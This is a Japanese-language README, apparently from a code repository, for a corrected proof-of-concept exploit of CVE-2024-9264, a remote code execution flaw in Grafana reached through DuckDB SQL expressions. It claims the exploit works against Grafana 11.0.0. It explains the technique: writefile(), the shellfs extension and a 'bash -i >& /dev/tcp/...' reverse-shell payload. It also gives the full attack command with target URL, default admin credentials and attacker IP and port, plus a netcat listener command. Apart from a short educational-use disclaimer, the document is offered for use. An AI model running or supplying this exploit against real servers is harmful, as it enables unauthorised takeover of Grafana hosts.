
CVE-2024-9264 用の修正された概念実証エクスプロイト。DuckDB SQL 式を介した重大な Grafana RCE。修正された shellfs 拡張機能と writefile() 関数を使用してリバースシェルを実行します。
これは、CVE-2024-9264(Grafanaにおける重大なリモートコード実行脆弱性、SQL式とDuckDB経由)の概念実証エクスプロイトの修正版です。
🔗 元のアドバイザリ: Grafana Security Release
❌ 元のPoC: 構文エラーと write_file() の誤った使用により破損
✅ このバージョンは動作します。脆弱なGrafana 11.0.0インスタンスでテスト済みです。
writefile() を使用(write_file() の代わり)(DuckDB関数)bash -i >& /dev/tcp/... を使用した適切なシェルペイロードshellfs 拡張機能を介してリバースシェルが正常に書き込まれ、実行されましたinstall shellfs from community を実行できることpython3 fixed_poc_writefile.py \
--url http://target:3000 \
--username admin \
--password admin \
--reverse-ip <YOUR_IP> \
--reverse-port 4444
その後、以下でリッスン:
nc -lvnp 4444
このプロジェクトは教育目的のみです。
テストする許可がないターゲットに対して使用しないでください。
修正・検証: Exerr — 元のPoC: z3k0sec。